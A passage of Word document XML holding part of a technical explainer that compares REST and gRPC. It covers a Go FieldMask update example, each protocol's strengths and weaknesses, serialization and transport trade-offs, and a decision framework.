      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    UpdateMask: &amp;fieldmaskpb.FieldMask{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849BACC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Paths: []string{"title"},  // only update title, leave author unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8FD6D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31A876" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38186CBE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C107F81" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  // Server implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF84078" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  func (s *Server) UpdateBook(ctx context.Context, req *UpdateBookRequest) (*Book, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE15CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    book, err := s.db.GetBook(ctx, req.Book.Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A277459" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Apply only masked fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7657A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if req.UpdateMask.Has("title") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECEFC8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      book.Title = req.Book.Title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7AC2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B549F4C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if req.UpdateMask.Has("author") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787010DB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      book.Author = req.Book.Author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E439146" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129240B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return s.db.UpdateBook(ctx, book)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225865FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D1990" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="3425C8FF">
          <v:rect id="_x0000_i6624" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA8451" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612CED6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A95BACE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST and gRPC = Two Philosophies for Distributed System Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C1E8B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">               Each optimized for different trade-offs between simplicity,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C8CB2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">               performance, type safety, and operational characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE461B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6464518C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST Core Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77995C98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Resources: nouns identified by URIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51823345" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Methods: HTTP verbs (GET/POST/PUT/PATCH/DELETE) carry semantic meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5C83E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Format: JSON (human-readable, self-describing, schema-optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120FB4C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Transport: HTTP/1.1 or HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F966631" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Patterns: request-response only (SSE for server push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB5F56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Contracts: informal (OpenAPI documents but doesn't enforce)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E531B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B05023" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Strengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFEF35A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Universal: every language/platform/tool speaks HTTP+JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CABD15" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Simple: no compilation step, curl works immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C48BFE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Cacheable: HTTP caching semantics → CDN, browser cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B866A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Debuggable: browser devtools, Postman, curl — all work natively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA03CCA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    External APIs: industry convention for public APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048F8A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A774461" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C871BE0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Verbose: JSON larger than binary, headers repeated per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364523A9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    No streaming: polling or SSE (server-only) as workarounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1575E895" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    No contract enforcement: field renames cause silent breakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67685BF7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    HTTP/1.1 HOL blocking: one request per connection (mitigated by HTTP/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D09A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0887BC89" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC Core Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A589315" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Services: collections of typed methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F7921" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Methods: defined in .proto, four patterns (unary/server-stream/client-stream/bidi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A69B10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Format: Protocol Buffers (binary, schema-required, field-number-keyed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399797DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Transport: HTTP/2 (multiplexed streams, header compression, binary framing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9FE70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Patterns: unary + all streaming patterns as first-class primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F92B98C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Contracts: formal, compiler-enforced, code-generated clients/servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE505CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C706D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Strengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2111CF1B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Performance: 3-8× faster serialization, 3-5× smaller payloads, multiplexed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342F98D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Type safety: compile-time contract enforcement, generated code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C7FA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Streaming: bidirectional streaming native to protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69CC97" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Polyglot: one .proto → clients in Go, Java, Python, Rust, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DA62D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Internal services: lingua franca for service-to-service communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420ED5D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E0C4B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A70C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Browser support: requires gRPC-Web translation layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4C8AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Debugging: binary format needs tooling (grpcurl, Postman)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F3548A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Compilation step: proto compile → code generate → compile service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FEF4BF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Caching: no HTTP caching semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A000937" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    External APIs: less universal than REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E8E45" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2254E0AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>The Serialization Trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3C578B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON:     text, ~1.2KB, human-readable, schema-optional, ~800 MB/s serialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF72B49" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: binary, ~350B (71% smaller), binary, schema-required, ~2500 MB/s serialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B448DC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFC151" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  At 100K RPS: Protobuf saves ~10% CPU on serialization alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A818EA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  At 1M RPS: meaningful compute cost difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D0B6B4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  For &lt;10K RPS: difference is negligible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDEE3C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5DA93B47" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>The Transport Trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053F792" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/1.1: one request per connection, text headers (large, uncompressed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D81A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2:   multiplexed streams (N RPCs, 1 connection), HPACK header compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6873561B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB2872" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST benefits from HTTP/2 too (upgrade is transparent, same API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B60B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC requires HTTP/2 (not optional — trailers require HTTP/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D899136" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6194AAD1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Decision Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A0AD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  External public API → REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E97B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Internal service-to-service → gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E6D58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Browser clients → REST (or gRPC-Web for streaming needs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D358F1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Mobile clients → REST (conventional) or gRPC (for performance/streaming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFB2E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Real-time streaming → gRPC bidirectional streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E6B28" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  High throughput (&gt;100K RPS) → gRPC for CPU/bandwidth savings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1BC52" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Simple CRUD, small team → REST (simpler, less setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C240A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Multi-language services, strict contracts → gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236F63F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191B5D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  The pragmatic approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF9C29B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    External API: REST (possibly with grpc-gateway transcoding from gRPC backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABBBDA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Internal services: gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64528AA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → One backend implementation, two protocol access paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E67F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → Best of both: REST for external consumers, gRPC performance internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510717CA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="18288EE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>The Versioning Principle (both REST and gRPC):</w:t>
      </w:r>
    </w:p>
